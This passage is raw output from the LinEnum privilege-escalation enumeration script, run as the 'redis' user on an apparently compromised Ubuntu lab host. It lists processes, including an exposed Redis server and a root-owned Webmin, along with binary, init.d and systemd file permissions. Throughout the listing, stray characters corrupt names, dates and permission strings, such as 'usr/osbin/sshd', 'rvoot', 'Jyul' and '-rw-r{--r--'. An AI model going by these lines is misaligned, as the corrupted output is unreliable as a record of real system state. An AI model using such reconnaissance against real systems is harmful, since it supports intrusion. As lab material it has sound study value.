[kstrp] root 116 0.0 0.0 0 0 ? I< 18:55 0:00 [charger_manager] root 178 0.0 0.0 0 0 ? I< 18:55 0:00 [mpt_poll_0] root 179 0.0 0.0 0 0 ? I< 18:55 0:00 [mpt/0] root 181 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/0:1H] root 182 0.0 0.0 0 0 ? S 18:55 0:00 [scsi_eh_2] root 183 0.0 0.0 0 0 ? I< 18:55 0:00 [scsi_tmf_2] root 204 0.0 0.0 0 0 ? S 18:55 0:00 [jbd2/sda1-8] root 205 0.0 0.0 0 0 ? I< 18:55 0:00 [ext4-rsv-conver] root 251 0.0 1.6 94828 15604 ? S<s 18:55 0:00 /lib/systemd/systemd-journald root 260 0.0 0.4 45576 4532 ? Ss 18:55 0:00 /lib/systemd/systemd-udevd systemd+ 340 0.0 0.5 70628 5424 ? Ss 18:55 0:00 /lib/systemd/systemnd-resolved systemd+ 341 0.0 0.3 141928 3212 ? Ssl 18:55 0:00 /lib/systemd/systemd-timesyncd syslog 343 0.0 0.4 263036 4400 ? Ssl 18:55 0:00 /usr/sbin/rsyslogd -n root 351 0.0 0.6 70608 5960 ? Ss 18:55 0:00 /lib/systemd/systemd-logind root 353 0.0 1.8 170344 17272 ? Ssl 18:55 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers message+ 354 0.0 0.4 50032 4500 ? Ss 18:55 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 355 0.0 0.7 289844 7168 ? Ssl 18:55 0:00 /usr/lib/accountsservice/accounts-daemon root 356 0.0 0.3 31320 3204 ? Ss 18:55 0:00 /usr/sbin/cron -f root 497 0.0 0.0 0 0 ? I< 18:55 0:00 [ttm_swap] root 498 0.0 0.0 0 0 ? S 18:55 0:00 [irq/16-vmwgfx] root 573 0.0 0.7 72296 6584 ? Ss 18:55 0:00 /usr/osbin/sshd -D root 591 0.0 0.2 16180 2040 tty1 Ss+ 18:55 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux redis 599 0.1 0.4 51576 4264 ? Ssl 18:55 0:04 /usr/bin/redis-server 0.0.0.0:6379 root 603 0.0 1.8 331332 16660 ? Ss 18:55 0:00 /usr/sbin/apache2 -k start www-data 608 0.0 1.0 335792 10016 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 609 0.0 1.0 335800 10084 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 610 0.0 0.9 335800 9032 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 611 0.0 1.0 335800 10028 ? S 18:55 0:00 /usr/sbin/apache2 -k start www-data 612 0.0 1.0 335800 10028 ? S 18:55 0:00 /usr/sbin/apache2 -k start root 687 0.0 3.1 95312 29328 ? Ss 18:55 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf www-data 774 0.0 1.0 335792 10024 ? S 19:06 0:00 /usr/sbin/apache2 -k start www-datpa 827 0.0 0.9 335792 9036 ? S 19:07 0:00 /usr/sbin/apache2 -k start root 914 0.0 0.0 0 0 ? I 19:32 0:00 [kworker/u256:0] root 981 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u256:2] root 984 0.0 0.7 107984 7288 ? Ss 19:52 0:00 sshd: redis [priv] redis 986 0.0 0.8 76616 7528 ? Ss 19:52 0:00 /lib/systemd/systemd --user redis 987 0.0 0.2 193400 2188 ? S 19:52 0:00 (sd-pam) redis 1035 0.0 0.3 107984 3632 ? S 19:52 0:00 sshd: redis@pts/0 redis 1036 0.0 0.5 22484 5040 pts/0 Ss 19:52 0:00 -bash root 1050 0.0 0.0 0 0 ? I 19:55 0:00 [kworker/u256:1] redis 1056 0.1 0.4 13676 3996 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1057 0.0 0.3 13808 3184 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1058 0.0 0.0 7476 884 pts/0 S+ 19:59 0:00 tee -a redis 1388 0q.0 0.3 13808 2996 pts/0 S+ 19:59 0:00 /bin/bash ./LinEnum.sh -t redis 1389 0.0 0.4 39664 3708 pts/0 R+ 19:59 0:00 ps aux [-] Process binaries and associated permissions (from above list): 1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 2019 /bin/bash 1.6M -rwxr-xr-x 1 root root 1.6M Jul 22 2019 /lib/systemd/systemd 128K -rwxr-xr-x 1 root root 127K Jul 22 2019 /lib/systemd/systemd-journald 216K -rwxr-xr-x 1 root root 215K Jul 22 2019 /lib/systemd/systemd-logind 372K -rwxr-xr-x 1 root root 371K Jul 22 2019 /lib/systemd/systemd-resolved 40K -rwxr-xr-x 1 root root 39K Jul 22 2019 /lib/systemd/systemd-timesyncd 572K -rwxr-xr-x 1 root root 571K Jul 22 2019 /lib/systemd/systemd-udevd 56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty 0 lrwxrwxrwx 1 root root 20 Jul 22 2019 /sbin/init -> /lib/systemd/systemd 232K -rwxr-xr-x 1 root root 232K Jun 10 2019 /usr/bin/dbus-daemon 2.1M -rwxr-xr-x 2 root root 2.1M Nov 19 2018 /usr/bin/perl 0 lrwxrwxrwx 1 rootr root 9 Oct 25 2018 /usr/bin/python3 -> python3.6 0 lrwxrwxrwx 1 root root 15 Jul 14 2019 /usr/bin/redis-server -> redis-check-rdb 180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon 656K -rwxr-xr-x 1 root root 656K Jul 16 2019 /usr/sbin/apache2 48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron 668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd 772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 124 drwxr-xr-x 2 root root 4096 Oct 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rwxr-xr-x 1 root root 8181 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 2489 Jul 16 2019 apache-htcacheclean -rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor -rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh -rwxr-xr-x 1 root root 3049 Nov 16 2017 cron -rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus -rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common -rwxr-xr-x 1 sroot root 3809 Feb 14 2018 hwclock.sh -rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance -rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod -rwxr-xr-x 1 root root 4597 Nov 25 2016 networking -rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth -rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log -rwxr-xr-x 1 root root 1191 Jan 17 2018 procps -rwxr-xr-x 1 root root 1702 Aug 25 2019 redis_6379 -rwxr-xr-x 1 root root 1614 Apr 2 2018 redis-server -rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync -rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog -rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh -rwxr-xr-x 1 root root 5974 Apr 20 2018 udev -rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw -rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd -rwxr-xr-x 1 root root 1853 May 5 2019 webmin [-] /lib/systemd/* config file permissions: /lib/systemd/: total 7.3M drwxr-xr-x 23 root root 36K Oct 25 2019 system drwxr-xr-x 2 root root 4.0K Oct 25 t2019 system-generators drwxr-xr-x 2 root root 4.0K Aug 24 2019 system-sleep drwxr-xr-x 2 root root 4.0K Aug 24 2019 network drwxr-xr-x 2 root root 4.0K Aug 24 2019 system-preset -rw-r--r-- 1 root root 2.3M Jul 22 2019 libsystemd-shared-237.so -rw-r--r-- 1 root root 699 Jul 22 2019 resolv.conf -rwxr-xr-x 1 root root 1.3K Jul 22 2019 set-cpufreq -rwxr-xr-x 1 root root 1.6M Jul 22 2019 systemd -rwxr-xr-x 1 root root 6.0K Jul 22 2019 systemd-ac-power -rwxr-xr-x 1 root root 18K Jul 22 2019 systemd-backlight -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-binfmt -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-cgroups-agent -rwxr-xr-x 1 root root 22K Jul 22 2019 systemd-cryptsetup -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-dissect -rwxr-xr-x 1 root root 18K Jul 22 2019 systemd-fsck -rwxr-xr-x 1 root root 23K Jul 22 2019 systemd-fsckd -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-growfs -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-hibernate-resume -rwxr-xr-x 1 roout root 23K Jul 22 2019 systemd-hostnamed -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-initctl -rwxr-xr-x 1 root root 127K Jul 22 2019 systemd-journald -rwxr-xr-x 1 root root 35K Jul 22 2019 systemd-localed -rwxr-xr-x 1 root root 215K Jul 22 2019 systemd-logind -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-makefs -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-modules-load -rwxr-xr-x 1 root root 1.6M Jul 22 2019 systemd-networkd -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-networkd-wait-online -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-quotacheck -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-random-seed -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-remount-fs -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-reply-password -rwxr-xr-x 1 root root 371K Jul 22 2019 systemd-resolved -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-rfkill -rwxr-xr-x 1 root root 43K Jul 22 2019 systemd-shutdown -rwxr-xr-x 1 root root 19K Jul 22 2019 systemd-sleep -rwxr-xr-x 1 rvoot root 23K Jul 22 2019 systemd-socket-proxyd -rwxr-xr-x 1 root root 11K Jul 22 2019 systemd-sulogin-shell -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-sysctl -rwxr-xr-x 1 root root 1.3K Jul 22 2019 systemd-sysv-install -rwxr-xr-x 1 root root 27K Jul 22 2019 systemd-timedated -rwxr-xr-x 1 root root 39K Jul 22 2019 systemd-timesyncd -rwxr-xr-x 1 root root 571K Jul 22 2019 systemd-udevd -rwxr-xr-x 1 root root 15K Jul 22 2019 systemd-update-utmp -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-user-sessions -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-veritysetup -rwxr-xr-x 1 root root 10K Jul 22 2019 systemd-volatile-root drwxr-xr-x 2 root root 4.0K Apr 20 2018 system-shutdown /lib/systemd/system: total 844K -rw-r--r-- 1 root root 1.2K Oct 25 2019 redis-server.service drwxr-xr-x 2 root root 4.0K Aug 25 2019 apache2.service.d drwxr-xr-x 2 root root 4.0K Aug 24 2019 halt.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 initrd-switch-root.target.wants drwxr-xr-x 2 rowot root 4.0K Aug 24 2019 kexec.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 reboot.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 getty.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 graphical.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 rescue.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 sockets.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 timers.target.wants drwxr-xr-x 2 root root 4.0K Aug 24 2019 rc-local.service.d drwxr-xr-x 2 root root 4.0K Aug 24 2019 user@.service.d lrwxrwxrwx 1 root root 14 Jul 22 2019 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 bootlogs.service -> /dev/null lrwxrwxrwxx 1 root root 9 Jul 22 2019 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Jul 22 2019 console-getty.service -rw-r--r-- 1 root root 1.3K Jul 22 2019 container-getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Jul 22 2019 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Jul 22 2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Jul 22 2019 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Jul 22 2019 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Jyul 22 2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 debug-shell.service lrwxrwxrwx 1 root root 16 Jul 22 2019 default.target -> graphical.target -rw-r--r-- 1 root root 797 Jul 22 2019 emergency.service lrwxrwxrwx 1 root root 9 Jul 22 2019 fuse.service -> /dev/null -rw-r--r-- 1 root root 2.0K Jul 22 2019 getty@.service -rw-r--r-- 1 root root 342 Jul 22 2019 getty-static.service lrwxrwxrwx 1 root root 9 Jul 22 2019 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Jul 22 2019 initrd-cleanup.service -rw-r--r-- 1 root root 830 Jul 22 2019 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Jul 22 2019 initrd-switch-root.service -rw-r--r-- 1 root root 704 Jul 22 2019 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Jul 22 2019 killprocs.service -z> /dev/null lrwxrwxrwx 1 root root 28 Jul 22 2019 kmod.service -> systemd-modules-load.service -rw-r--r-- 1 root root 717 Jul 22 2019 kmod-static-nodes.service lrwxrwxrwx 1 root root 28 Jul 22 2019 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Jul 22 2019 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 mountnfs.service -> /dev/null -rw-r--r-- 1 root root 362 Jul 22 2019 ondemand.service lrwxrwxrwx 1 root root 22 Jul 22 2019 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root root 609 Jul 22 2019 quotaon.service -rw-r{--r-- 1 root root 716 Jul 22 2019 rc-local.service lrwxrwxrwx 1 root root 16 Jul 22 2019 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Jul 22 2019 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Jul 22 2019 rescue.service lrwxrwxrwx 1 root root 9 Jul 22 2019 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Jul 22 2019 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Jul 22 2019 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Jul 22 2019 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Jul 22 2019 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Jul 22 2019 runlevel6.target -&g|t; reboot.target lrwxrwxrwx 1 root root 9 Jul 22 2019 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Jul 22 2019 serial-getty@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 554 Jul 22 2019 suspend-then-hibernate.target -rw-r--r-- 1 root root 724 Jul 22 2019 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Jul 22 2019 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Jul 22 2019 systemd-backlight@.service -rw-r--r-- 1 root root 999 Jul 22 2019 systemd-binfmt.service -rw-r--r-- 1 root root 537 Jul 22 2019 systemd-exit.service -rw-r--r-- 1 root root 551 Jul 22 2019 systemd-fsckd.service -rw-r--r-- 1 root root 540 Jul 22 2019 systemd-fsckd.socket -rw-r--r-- 1 root root 714 Jul 22 2019 systemd-fsck-root.service -rw-r--r-- 1 root r}oot 715 Jul 22 2019 systemd-fsck@.service -rw-r--r-- 1 root root 584 Jul 22 2019 systemd-halt.service -rw-r--r-- 1 root root 671 Jul 22 2019 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 541 Jul 22 2019 systemd-hibernate.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-hostnamed.service -rw-r--r-- 1 root root 818 Jul 22 2019 systemd-hwdb-update.service -rw-r--r-- 1 root root 559 Jul 22 2019 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 551 Jul 22 2019 systemd-initctl.service -rw-r--r-- 1 root root 686 Jul 22 2019 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.6K Jul 22 2019 systemd-journald.service -rw-r--r-- 1 root root 771 Jul 22 2019 systemd-journal-flush.service -rw-r--r-- 1 root root 597 Jul 22 2019 systemd-kexec.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-localed.service -rw-r--r-- 1 root root 1.5K Jul 22 2019 systemd-logind.service -rw-r--r-- 1 root root 733 Jul 22 2019 systemd-machine-id-commit.service -rw-r--r-- 1 root root 100~7 Jul 22 2019 systemd-modules-load.service -rw-r--r-- 1 root root 1.9K Jul 22 2019 systemd-networkd.service -rw-r--r-- 1 root root 740 Jul 22 2019 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 593 Jul 22 2019 systemd-poweroff.service -rw-r--r-- 1 root root 655 Jul 22 2019 systemd-quotacheck.service -rw-r--r-- 1 root root 792 Jul 22 2019 systemd-random-seed.service -rw-r--r-- 1 root root 588 Jul 22 2019 systemd-reboot.service -rw-r--r-- 1 root root 833 Jul 22 2019 systemd-remount-fs.service -rw-r--r-- 1 root root 1.7K Jul 22 2019 systemd-resolved.service -rw-r--r-- 1 root root 724 Jul 22 2019 systemd-rfkill.service -rw-r--r-- 1 root root 537 Jul 22 2019 systemd-suspend.service -rw-r--r-- 1 root root 573 Jul 22 2019 systemd-suspend-then-hibernate.service -rw-r--r-- 1 root root 693 Jul 22 2019 systemd-sysctl.service -rw-r--r-- 1 root root 1.1K Jul 22 2019 systemd-timedated.service -rw-r--r-- 1 root root 1.4K Jul 22 2019 systemd-timesyncd.service -rw-r--r-- 1 root root 659 Jul 22 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 764 Jul 22 2019 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 744 Jul 22 2019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 985 Jul 22 2019 systemd-udevd.service -rw-r--r-- 1 root root 863 Jul 22 2019 systemd-udev-settle.service -rw-r--r-- 1 root root 755 Jul 22 2019 systemd-udev-trigger.service -rw-r--r-- 1 root root 797 Jul 22 2019 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 794 Jul 22 2019 systemd-update-utmp.service -rw-r--r-- 1 root root 628 Jul 22 2019 systemd-user-sessions.service -rw-r--r-- 1 root root 690 Jul 22 2019 systemd-volatile-root.service -rw-r--r-- 1 root root 1.4K Jul 22 2019 system-update-cleanup.service lrwxrwxrwx 1 root root 21 Jul 22 2019 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 9 Jul 22 2019 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 22 2019 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Jul 22 2019 urandom.service -> systemd-random-seed.service -rw-r--r-- 1 root root 593 Jul 22 2019 user@.service lrwxrwxrwx 1 root root 9 Jul 22 2019 x11-common.service -> /dev/null -rw-r--r-- 1 root root 346 Jul 16 2019 apache2.service -rw-r--r-- 1 root root 418 Jul 16 2019 apache2@.service -rw-r--r-- 1 root root 528 Jul 16 2019 apache-htcacheclean.service -rw-r--r-- 1 root root 537 Jul 16 2019 apache-htcacheclean@.service -rw-r--r-- 1 root root 2.4K Jul 14 2019 redis-server@.service -rw-r--r-- 1 root root 161 Jul 8 2019 motd-news.timer -rw-r--r-- 1 root root 505 Jun 10 2019 dbus.service -rw-r--r-- 1 root root 106 Jun 10 2019 dbus.socket -rw-r--r-- 1 root root 326 May 7 2019 apt-daily.service -rw-r--r-- 1 root root 156 May 7 2019 apt-daily.timer -rw-r--r-- 1 root root 238 May 7 2019 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 May 7 2019 apt-daily-upgrade.timer -rw-r--r-- 1 root root 312 Apr 23 2019 console-setup.service -rw-r--r-- 1 root root 287 Apr 23 2019 keyboard-setup.service -rw-r--r-- 1 root root 330 Apr 23 2019 setvtrgb.service -rw-r--r-- 1 root root 404 Apr 9 2019 ureadahead.service -rw-r--r-- 1 root root 250 Apr 9 2019 ureadahead-stop.service -rw-r--r-- 1 root root 242 Apr 9 2019 ureadahead-stop.timer -rw-r--r-- 1 root root 412 Apr 4 2019 plymouth-halt.service -rw-r--r-- 1 root root 426 Apr 4 2019 plymouth-kexec.service lrwxrwxrwx 1 root root 27 Apr 4 2019 plymouth-log.service -> plymouth-read-write.service -rw-r--r-- 1 root root 421 Apr 4 2019 plymouth-poweroff.service -rw-r--r-- 1 root root 194 Apr 4 2019 plymouth-quit.service -rw-r--r-- 1 root root 200 Apr 4 2019 plymouth-quit-wait.service -rw-r--r-- 1 root root 244 Apr 4 2019 plymouth-read-write.service -rw-r--r-- 1 root root 416 Apr 4 2019 plymouth-reboot.service lrwxrwxrwx 1 root root 21 Apr 4 2019 plymouth.service -> plymouth-quit.service -rw-r--r-- 1 root root 532 Apr 4 2019 plymouth-start.service -rw-r--r-- 1 root root 291 Apr 4 2019 plymouth-switch-root.service -rw-r--r-- 1 root root 490 Apr 4 2019 systemd-ask-password-plymouth.path -rw-r--r-- 1 root root 467 Apr 4 2019 systemd-ask-password-plymouth.service -rw-r--r-- 1 root root 368 Jan 9 2019 irqbalance.service -rw-r--r-- 1 root root 92 Oct 15 2018 fstrim.service -rw-r--r-- 1 root root 170 Oct 15 2018 fstrim.timer -rw-r--r-- 1 root root 189 Oct 15 2018 uuidd.service -rw-r--r-- 1 root root 126 Oct 15 2018 uuidd.socket -rw-r--r-- 1 root root 618 Oct 15 2018 friendly-recovery.service -rw-r--r-- 1 root root 172 Oct 15 2018 friendly-recovery.target -rw-r--r-- 1 root root 258 Oct 15 2018 networkd-dispatcher.service -rw-r--r-- 1 root root 173 Aug 6 2018 motd-news.service -rw-r--r-- 1 root root 290 Apr 24 2018 rsyslog.service drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants -rw-r--r-- 1 root root 544 Mar 22 2018 apparmor.service -rw-r--r-- 1 root root 919 Jan 28 2018 basic.target -rw-r--r-- 1 root root 419 Jan 28 2018 bluetooth.target -rw-r--r-- 1 root root 465 Jan 28 2018 cryptsetup-pre.target -rw-r--r-- 1 root root 412 Jan 28 2018 cryptsetup.target -rw-r--r-- 1 root root 750 Jan 28 2018 dev-hugepages.mount -rw-r--r-- 1 root root 665 Jan 28 2018 dev-mqueue.mount -rw-r--r-- 1 root root 471 Jan 28 2018 emergency.target -rw-r--r-- 1 root root 541 Jan 28 2018 exit.target -rw-r--r-- 1 root root 480 Jan 28 2018 final.target -rw-r--r-- 1 root root 506 Jan 28 2018 getty-pre.target -rw-r--r-- 1 root root 500 Jan 28 2018 getty.target -rw-r--r-- 1 root root 598 Jan 28 2018 graphical.target -rw-r--r-- 1 root root 527 Jan 28 2018 halt.target -rw-r--r-- 1 root root 509 Jan 28 2018 hibernate.target -rw-r--r-- 1 root root 530 Jan 28 2018 hybrid-sleep.target -rw-r--r-- 1 root root 593 Jan 28 2018 initrd-fs.target -rw-r--r-- 1 root root 561 Jan 28 2018 initrd-root-device.target -rw-r--r-- 1 root root 566 Jan 28 2018 initrd-root-fs.target -rw-r--r-- 1 root root 754 Jan 28 2018 initrd-switch-root.target -rw-r--r-- 1 root root 763 Jan 28 2018 initrd.target -rw-r--r-- 1 root root 541 Jan 28 2018 kexec.target -rw-r--r-- 1 root root 435 Jan 28 2018 local-fs-pre.target -rw-r--r-- 1 root root 547 Jan 28 2018 local-fs.target -rw-r--r-- 1 root root 445 Jan 28 2018 machine.slice -rw-r--r-- 1 root root 532 Jan 28 2018 multi-user.target -rw-r--r-- 1 root root 505 Jan 28 2018 network-online.target -rw-r--r-- 1 root root 502 Jan 28 2018 network-pre.target -rw-r--r-- 1 root root 521 Jan 28 2018 network.target -rw-r--r-- 1 root root 554 Jan 28 2018 nss-lookup.target -rw-r--r-- 1 root root 513 Jan 28 2018 nss-user-lookup.target -rw-r--r-- 1 root root 394 Jan 28 2018 paths.target -rw-r--r-- 1 root root 592 Jan 28 2018 poweroff.target -rw-r--r-- 1 root root 417 Jan 28 2018 printer.target -rw-r--r-- 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 583 Jan 28 2018 reboot.target -rw-r--r-- 1 root root 549 Jan 28 2018 remote-cryptsetup.target -rw-r--r-- 1 root root 436 Jan 28 2018 remote-fs-pre.target -rw-r--r-- 1 root root 522 Jan 28 2018 remote-fs.target -rw-r--r-- 1 root root 492 Jan 28 2018 rescue.target -rw-r--r-- 1 root root 540 Jan 28 2018 rpcbind.target -rw-r--r-- 1 root root 442 Jan 28 2018 shutdown.target -rw-r--r-- 1 root root 402 Jan 28 2018 sigpwr.target -rw-r--r-- 1 root root 460 Jan 28 2018 sleep.target -rw-r--r-- 1 root root 449 Jan 28 2018 slices.target -rw-r--r-- 1 root root 420 Jan 28 2018 smartcard.target -rw-r--r-- 1 root root 396 Jan 28 2018 sockets.target -rw-r--r-- 1 root root 420 Jan 28 2018 sound.target -rw-r--r-- 1 root root 503 Jan 28 2018 suspend.target -rw-r--r-- 1 root root 393 Jan 28 2018 swap.target -rw-r--r-- 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 558 Jan 28 2018 sysinit.target -rw-r--r-- 1 root root 767 Jan 28 2018 sys-kernel-config.mount -rw-r--r-- 1 root root 710 Jan 28 2018 sys-kernel-debug.mount -rw-r--r-- 1 root root 1.4K Jan 28 2018 syslog.socket -rw-r--r-- 1 root root 704 Jan 28 2018 systemd-ask-password-console.path -rw-r--r-- 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path -rw-r--r-- 1 root root 564 Jan 28 2018 systemd-initctl.socket -rw-r--r-- 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 882 Jan 28 2018 systemd-journald.socket -rw-r--r-- 1 root root 631 Jan 28 2018 systemd-networkd.socket -rw-r--r-- 1 root root 657 Jan 28 2018 systemd-rfkill.socket -rw-r--r-- 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 635 Jan 28 2018 systemd-udevd-control.socket -rw-r--r-- 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 445 Jan 28 2018 system.slice -rw-r--r-- 1 root root 592 Jan 28 2018 system-update.target -rw-r--r-- 1 root root 445 Jan 28 2018 timers.target -rw-r--r-- 1 root root 435 Jan 28 2018 time-sync.target -rw-r--r-- 1 root root 457 Jan 28 2018 umount.target -rw-r--r-- 1 root root 432 Jan 28 2018 user.slice -rw-r--r-- 1 root root 493 Jan 25 2018 ssh.service -rw-r--r-- 1 root root 244 Jan 25 2018 ssh@.service lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/null -rw-r--r-- 1 root root 155 Jan 17 2018 